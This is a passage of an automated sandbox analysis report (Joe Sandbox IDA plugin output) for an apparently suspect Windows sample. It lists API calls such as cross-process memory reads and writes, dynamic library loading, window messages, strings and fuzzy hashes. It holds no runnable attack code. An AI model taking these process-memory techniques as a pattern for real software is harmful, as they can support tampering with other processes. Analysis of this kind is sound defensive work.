                                                                                                                  • Part of subcall function 0020B8A7: _memmove.LIBCMT ref: 0020B8FB
                                                                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002450FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                • String ID: REMOVE$THIS
                                                                                                                • API String ID: 2528338962-776492005
                                                                                                                • Opcode ID: 3843d76d62cc05f726cacbe768cbcd3c954159deffe7f8cc3a5b3f382e9d3bdc
                                                                                                                • Instruction ID: 639b3922de8b25d525bf5e53e9464689dbda19ba148e344e1da13fd29a8229f1
                                                                                                                • Opcode Fuzzy Hash: 3843d76d62cc05f726cacbe768cbcd3c954159deffe7f8cc3a5b3f382e9d3bdc
                                                                                                                • Instruction Fuzzy Hash: FA419334A2061A9FCF05DF54C881AAEB7B5BF48304F048469E89AAB393D7349D61CF50
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00244D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0023C9FE,?,?,00000034,00000800,?,00000034), ref: 00244D6B
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0023CFC9
                                                                                                                  • Part of subcall function 00244D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0023CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00244D36
                                                                                                                  • Part of subcall function 00244C65: GetWindowThreadProcessId.USER32(?,?), ref: 00244C90
                                                                                                                  • Part of subcall function 00244C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0023C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00244CA0
                                                                                                                  • Part of subcall function 00244C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0023C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00244CB6
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0023D036
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0023D083
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                • Opcode ID: 9c274e77411ea86cf81147ec1c95f0e4c3da0132f016cd870a6b3f1dc159f6ba
                                                                                                                • Instruction ID: 82cb37e1ae39113245ffa8526578665391211e63efe91214c91638125ceca2c5
                                                                                                                • Opcode Fuzzy Hash: 9c274e77411ea86cf81147ec1c95f0e4c3da0132f016cd870a6b3f1dc159f6ba
                                                                                                                • Instruction Fuzzy Hash: F5416DB6901218AFDB14EFA4DD85FDEB778EF09700F008095EA45BB181DA706E59CF60
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0029DBF0,00000000,?,?,?,?), ref: 0026A4E6
                                                                                                                • GetWindowLongW.USER32 ref: 0026A503
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0026A513
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long
                                                                                                                • String ID: SysTreeView32
                                                                                                                • API String ID: 847901565-1698111956
                                                                                                                • Opcode ID: 37ea4e8f78c47d534490958364c413532fc80039f561080d1f340b2fa5552a3a
                                                                                                                • Instruction ID: 6af67ade2aeb92c8c0d1f300e4da0a00c7701cf7de92b3a35a2737b072468dde
                                                                                                                • Opcode Fuzzy Hash: 37ea4e8f78c47d534490958364c413532fc80039f561080d1f340b2fa5552a3a
                                                                                                                • Instruction Fuzzy Hash: E131B235520206AFDB219F38DC45BEA7BA9FB49324F204715F875A31E1D770E8A09B51
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 002557E7
                                                                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0025581D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CrackInternet_memset
                                                                                                                • String ID: ?K%$|
                                                                                                                • API String ID: 1413715105-1067147212
                                                                                                                • Opcode ID: ba900573a859689484410500f3dbf6a3f52719eb11fae100bc9e8ee010e4b901
                                                                                                                • Instruction ID: 920e28504886771b40b816eac2359586890c7d6a75f21cf4d18fd3891ea5e519
                                                                                                                • Opcode Fuzzy Hash: ba900573a859689484410500f3dbf6a3f52719eb11fae100bc9e8ee010e4b901
                                                                                                                • Instruction Fuzzy Hash: CB310C71920229ABCF11AFA0DC95DEF7FB9FF18310F104055F815A6162DB31996ADF60
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00269F6B
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00269F7F
                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00269FA3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window
                                                                                                                • String ID: SysMonthCal32
                                                                                                                • API String ID: 2326795674-1439706946
                                                                                                                • Opcode ID: 2b3ea2a11845fb39fb6e2475e557f81e11d8b6015a987a1766c03b20b8a4cdd3
                                                                                                                • Instruction ID: 4d0ca5f99f7b2d7aa8778c6bdaae8e013afa1b4a6c42f07ffe014bca65b1bb18
                                                                                                                • Opcode Fuzzy Hash: 2b3ea2a11845fb39fb6e2475e557f81e11d8b6015a987a1766c03b20b8a4cdd3
                                                                                                                • Instruction Fuzzy Hash: 6921E532520219BBDF118F54DC46FEA3B79EF58714F120214FA15BB1D0DAB1E8A09B90
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0026A74F
                                                                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0026A75D
                                                                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0026A764
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyWindow
                                                                                                                • String ID: msctls_updown32
                                                                                                                • API String ID: 4014797782-2298589950
                                                                                                                • Opcode ID: ba3afb0f9a729e6733bac1f3c6d7458b443f5ee100415f642b7e8ef4b0c41f40
                                                                                                                • Instruction ID: e4207bf65f69471ffe886db082c8742d142b4a1e834b3f2d24662d098b1920ef
                                                                                                                • Opcode Fuzzy Hash: ba3afb0f9a729e6733bac1f3c6d7458b443f5ee100415f642b7e8ef4b0c41f40
                                                                                                                • Instruction Fuzzy Hash: F921B5B5610205AFEB11DF68DCC5EAB77ACEF4A394B140159F90197252C770EC61CF61
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0026983D
                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0026984D
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00269872
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                • String ID: Listbox
                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                • Opcode ID: 10019823b30f71a4be10e47607e221a8d416224da5a504c523cef5dc5429ffda
                                                                                                                • Instruction ID: 7393cba6b656fda82041babc2c52d5c6f4f99324152f7a944eb4ce5272ba5f03
                                                                                                                • Opcode Fuzzy Hash: 10019823b30f71a4be10e47607e221a8d416224da5a504c523cef5dc5429ffda
                                                                                                                • Instruction Fuzzy Hash: 0221D771620119BFEF128F54DC85FFB3BAEEF8A754F118124F9045B190CA719CA18BA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0026A27B
                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0026A290
                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0026A29D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: msctls_trackbar32
                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                • Opcode ID: 873e4a5d46aa11e403c889ea29b12c14774f1d4c37639e95a061109be8de8913
                                                                                                                • Instruction ID: 696cefc890df7ee64f0e348e632c7c0c19b4872054b3c6fec12e9ac26c0ef61d
                                                                                                                • Opcode Fuzzy Hash: 873e4a5d46aa11e403c889ea29b12c14774f1d4c37639e95a061109be8de8913
                                                                                                                • Instruction Fuzzy Hash: 7911E771250209BBEF205F75DC46FE73BA8EF89B54F114118FA45A6091D27298A1CF60
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00223028,?), ref: 00222F79
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00222F80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoInitialize$combase.dll
                                                                                                                • API String ID: 2574300362-340411864
                                                                                                                • Opcode ID: a37625a993ef946bc4560fa6f32d761acf46b3d74d3afc045eefa5a7f1af7970
                                                                                                                • Instruction ID: 4eb31ba9d7a53c1ab2332796b060a1fbcb4deaed65469af39c5f6a0859b67781
                                                                                                                • Opcode Fuzzy Hash: a37625a993ef946bc4560fa6f32d761acf46b3d74d3afc045eefa5a7f1af7970
                                                                                                                • Instruction Fuzzy Hash: E1E0E5786A5305FADF206F70FDCEF157664AB01706F540424B10AD10E0CBB58458DB04
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00222F4E), ref: 0022304E
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00223055
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RoUninitialize$combase.dll
                                                                                                                • API String ID: 2574300362-2819208100
                                                                                                                • Opcode ID: a083817ba08a3956a2252c1fbb2c69d98f04c6d9e1413a74e3c849e88fd8807d
                                                                                                                • Instruction ID: e4aa4835f985f88b46ce62fe50f37b9a9760ee40ade943664a3e2b997f1ae33b
                                                                                                                • Opcode Fuzzy Hash: a083817ba08a3956a2252c1fbb2c69d98f04c6d9e1413a74e3c849e88fd8807d
                                                                                                                • Instruction Fuzzy Hash: 22E09278666205EBDB20AFA1BD8DF057A64B700702F140514F10D910F0CBB885188B14
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LocalTime__swprintf
                                                                                                                • String ID: %.3d$WIN_XPe
                                                                                                                • API String ID: 2070861257-2409531811
                                                                                                                • Opcode ID: 1370740391a035bcccae6aee36bf3b36f2b3072368dc6c073edc6011f2b929b3
                                                                                                                • Instruction ID: 867e4d0230a629f05de3cb5bedec120b46cf745287bbe3af8d3d6d90b11c414b
                                                                                                                • Opcode Fuzzy Hash: 1370740391a035bcccae6aee36bf3b36f2b3072368dc6c073edc6011f2b929b3
                                                                                                                • Instruction Fuzzy Hash: 65E0EC7183911CFACB16EB909C46AFA73BCAB04300F148492BD1A91044D3759B78AB11
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0021E69C,75570AE0,0021E5AC,0029DC28,?,?), ref: 0021E6B4
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0021E6C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                • API String ID: 2574300362-192647395
                                                                                                                • Opcode ID: 1f72e584e650a2b51a2563f61b9133b48754264c4ff534e65e8173f13fff0e2e
                                                                                                                • Instruction ID: 8ded11af3ebd73f4e8740430f4bddd9ec4c1df9c411858dadf4a51f3c6fc4f1c
                                                                                                                • Opcode Fuzzy Hash: 1f72e584e650a2b51a2563f61b9133b48754264c4ff534e65e8173f13fff0e2e
                                                                                                                • Instruction Fuzzy Hash: 5BD0A738420313DFDB215F31FC0C68237D8AF34702B415419E949D21A0D770D4D4C710
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0021E6D9,?,0021E55B,0029DC28,?,?), ref: 0021E6F1
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0021E703
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: IsWow64Process$kernel32.dll
                                                                                                                • API String ID: 2574300362-3024904723
                                                                                                                • Opcode ID: e154729b97c67a6f9fd15e3aa32c776b482558ae6dc13a4ec6bfca713cd2d481
                                                                                                                • Instruction ID: c4da1d707e47a2658b67e6bd0428d8ce7f3552639841e8b68b7dc3a1fed4ae0a
                                                                                                                • Opcode Fuzzy Hash: e154729b97c67a6f9fd15e3aa32c776b482558ae6dc13a4ec6bfca713cd2d481
                                                                                                                • Instruction Fuzzy Hash: A7D0A738420313DFEB242F21FC4C6837BD4BF16701B014519E899D21D0D770D4D48710
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0025EBAF,?,0025EAAC), ref: 0025EBC7
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0025EBD9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                • API String ID: 2574300362-1816364905
                                                                                                                • Opcode ID: c9193e540de14e089da6ae15801552da955699339234a83e1d8360f0b92182da
                                                                                                                • Instruction ID: 15bad564360790640518ece5152ea71401aa9d6327d79bc56f318135f0a99bb4
                                                                                                                • Opcode Fuzzy Hash: c9193e540de14e089da6ae15801552da955699339234a83e1d8360f0b92182da
                                                                                                                • Instruction Fuzzy Hash: 50D0A7384243139FDF202F31F88CA4177E4BF0470BB519419F85AD1190DB70D8988710
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,?,0024135F,?,00241440), ref: 00241389
                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 0024139B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1071820185
                                                                                                                • Opcode ID: 525b411ff7fea47607973cfc64eb9f22b1b1ef178319e7fd03f95f1b7b71644a
                                                                                                                • Instruction ID: 2acc573fee407ac6c3a84c80324e2f1433df9962e75e6610b1c631088295ad40
                                                                                                                • Opcode Fuzzy Hash: 525b411ff7fea47607973cfc64eb9f22b1b1ef178319e7fd03f95f1b7b71644a
                                                                                                                • Instruction Fuzzy Hash: B0D0A734820713AFD7205F24FC0C7813BD4AF04745F044859E489D19D0D670D4E48710
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00241371,?,00241519), ref: 002413B4
                                                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 002413C6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                • API String ID: 2574300362-1587604923
                                                                                                                • Opcode ID: 3eb754fbf71cc50dff1edd44676dc802922227908d7de44be7f24fdadbdb1179
                                                                                                                • Instruction ID: 1d796668ae4d059d9a20325d6306048ca2217324ae61300ac4e5ce0129b442cd
                                                                                                                • Opcode Fuzzy Hash: 3eb754fbf71cc50dff1edd44676dc802922227908d7de44be7f24fdadbdb1179
                                                                                                                • Instruction Fuzzy Hash: 80D0A735825313AFD7245F24FC4C6513BE8AF40705F004459F49AD15A0EA70C4E48710
                                                                                                                APIs
